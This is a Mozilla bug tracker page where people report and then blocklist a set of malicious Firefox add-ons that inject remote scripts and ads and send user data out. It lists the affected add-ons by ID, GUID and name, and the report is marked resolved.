Closed
Bug 1514865
Opened 5 years ago
Closed 5 years ago
Blocklist malicious add-ons injecting ads
Categories
(Toolkit :: Blocklist Policy Requests, enhancement)
Toolkit
Blocklist Policy Requests
Tracking
()
RESOLVED
FIXED
People
(Reporter: rctgamer3, Assigned: Fallen)
Details
These add-ons are installed from hard-to-escape .cool TLD domains. These add-ons have remote script injection. Functions include ad injection from different networks and more.
{8ec160b7-1089-4944-a999-a1d6afa71c5d}
{223a1503-772d-45eb-8cb8-e2e49563703d}
Probably similar ones floating around.
|
||
Comment 1•5 years ago
|
||
Philipp, can you look into these?
+---------+----------------------------------------+-------------------+
| id | guid | Name |
+---------+----------------------------------------+-------------------+
| 1014280 | {223a1503-772d-45eb-8cb8-e2e49563703d} | Logitech SetPoint |
| 1016222 | {8ec160b7-1089-4944-a999-a1d6afa71c5d} | stationery |
| 1016394 | {cfacacd6-191c-46c4-b78c-8a48289b2829} | stationery |
| 1016395 | {1155e72f-2b21-433f-ba9a-5af6ed40c8ee} | triggerer |
| 1016396 | {583910bd-759f-40f6-b96a-1d678d65650f} | PredictionR |
+---------+----------------------------------------+-------------------+Flags: needinfo?(philipp)
|
Assignee | |
Comment 2•5 years ago
|
||
I found a bunch of other add-ons using .cool domains that have potential for being similar. I'm running a query for more of them which should be through tomorrow morning. The ones you posted are definitely affected, they inject remote scripts and mask as other add-ons. Inspecting the remote scripts, they seem to inject content scripts into all urls that exfiltrate data.
|
|
Assignee | |
Updated•5 years ago
|
Assignee: nobody → philipp
Status: NEW → ASSIGNED
Flags: needinfo?(philipp)
|
|
Assignee | |
Comment 3•5 years ago
|
||
Most interesting piece of code I found while looking at these: ゚ω゚ノ= /`m´)ノ ~┻━┻ . I learned about two new obfuscators in the process.
The add-ons all have a remote script injection and exfiltrate data, some are obfuscated in different ways.
I found a total of 241 add-ons, many of which are already blocked. Here is the remaining list:
811823 | {4c4ceb83-f3f1-ad73-bfe0-259a371ed872} | coolgamechannel extension
939357 | {a941b5ab-8894-41e1-a2ca-c5a6e2769c5f} | Prices Viewer Plus
939359 | {56488007-bd74-4702-9b6d-aee8f6cc05ea} | Web Sketchpad
939360 | {9eebac07-ac86-4be7-928f-e1015f858eee} | Tab Thumbnails
939363 | {5a993517-5be7-480e-a86c-b8e8109fa774} | Web Scraping Tool
939364 | {309ad78e-efff-43cf-910c-76361c536b20} | Video Converter
942821 | {cefcf45b-dfec-4072-9ffc-317094c69c28} | Porn AdBloker
987159 | {5b04980b-25e9-4bc6-b6ea-02c58d86cc5e} | management
987184 | {0021a844-360f-480e-ac53-47391b7b17b4} | omnibox
987428 | {2bed9f51-62a8-4471-b23c-827e6727c794} | pageCapture
987839 | {7d2130d3-d724-4f58-b6b7-8537a9e09d4c} | permissions
987847 | {ccd3847a-e5ec-4d28-bf98-340230dcbd4d} | platformKeys
987994 | {83716b9b-6e6e-4471-af76-2d846f5804f3} | power
989404 | {5154c03a-4bfc-4b13-86a9-0581a7d8c26d} | CanvasBlocker
1000128 | {24f51c5c-e3f5-4667-bd6c-0be4f6ef5cc2} | HotModuleReplacement
1000161 | {73554774-4390-4b00-a5b9-84e8e06d6f3c} | HtmlWebpack
1000169 | {c70cfd12-6dc3-4021-97f2-68057b3b759b} | I18nWebpack
1000956 | {ef5fe17b-eb6a-4e5e-9c18-9d423525bbbd} | Zopfli
1000962 | {461eb9b4-953c-4412-998e-9452a7cb42e0} | LimitChunkCount
1000972 | {966b00fe-40b0-4d4b-8fde-6deca31c577b} | LoaderOptions
1002047 | {dab908ac-e1b0-4d7e-bc2e-86a15f37621f} | MinChunkSize
1002735 | {01a067d3-7bfa-44ac-8da7-2474a0114a7e} | MiniCssExtract
1002736 | {6126261f-d025-4254-a1db-068a48113b11} | NoEmitOnErrors
1002868 | {6c80453f-05ec-4243-bb71-e1aac5e59cae} | NormalModule
1002875 | {f94ec34b-5590-4518-8546-c1c3a94a5731} | NpmInstall
1002880 | {5d4c049e-7433-485a-ac62-dd6e41af1a73} | Progress
1003047 | {507f643d-6db8-47fe-af9c-7a7b85a86d83} | SourceMapDev
1003056 | {5c56eeb4-f97c-4b0d-a72f-8e639fbaf295} | Webpack
1003073 | {2ef98f55-1e26-40d3-a113-a004618a772e} | OSDR
1003406 | {77d58874-d516-4b00-b68a-2d987ef83ec5} | TPMplt
1003423 | {7a0755d3-3ba2-4b19-98ce-efcdc36423fc} | nlgeocoder
1004877 | {47ee3ba1-8974-4f71-b8a4-8033d8c2155f} | SourceBuildExt
1009585 | {a477f774-bc36-4cc8-85bd-99f6b04ea255} | __MSG_extName__
1009586 | {1a2e41e3-4343-4a00-90cd-ce77ac77a8af} | Panic button
1009744 | {7b180e9a-afd6-4693-94a1-c7b5ed9b46fa} | Empty Cache Button
1010338 | {51f76862-f222-414d-8724-6063f61bbabf} | Show my Password
1010897 | {d47a0c63-ac4c-48ce-8fc7-c5abc81d7f75} | Dom Counter
1011546 | {b8adf653-f262-413c-b955-100213b105ad} | tabCapture
1011748 | {ccedf35b-dfd6-417a-80de-fb432948861d} | KIYPlugin
1011841 | {70e29b0e-7cd8-40df-b560-cf6eb066350d} | CommonsChunkPlugin
1012186 | {9926f8ad-b4c3-4122-a033-1b8a5db416db} | Bookmark Tab Here
1012200 | {62eefb1c-a2d8-40ba-ab94-9fc2f2d31b2f} | Try XPath
1013060 | {17f14919-00bd-44a4-8c14-78ab9728038f} | Pray Times!
1013101 | {20e36a3e-672c-4448-9efb-5750cbffe90c} | Socks Proxy
1013595 | {6070c95f-6460-4ffd-9846-2bbd7238697f} | WP Detective
1014268 | {1edb8a4e-f105-4623-9e19-e40fb082b132} | News Feed for GitHub
1014280 | {223a1503-772d-45eb-8cb8-e2e49563703d} | Logitech SetPoint
1014327 | {59e0f01c-1f70-445c-a572-7be5d85549bd} | Copyfish
1016222 | {8ec160b7-1089-4944-a999-a1d6afa71c5d} | stationery
1016373 | {d2d111d6-0ea1-4880-ae7b-2e82dff3a719} | ectotemp
1016394 | {cfacacd6-191c-46c4-b78c-8a48289b2829} | stationery
1016395 | {1155e72f-2b21-433f-ba9a-5af6ed40c8ee} | triggerer
1016396 | {583910bd-759f-40f6-b96a-1d678d65650f} | PredictionR|
|
||
Comment 5•5 years ago
|
||
Done, thanks.
Status: ASSIGNED → RESOLVED
Closed: 5 years ago
Flags: needinfo?(jorge)
Resolution: --- → FIXED
You need to log in
before you can comment on or make changes to this bug.
Description
•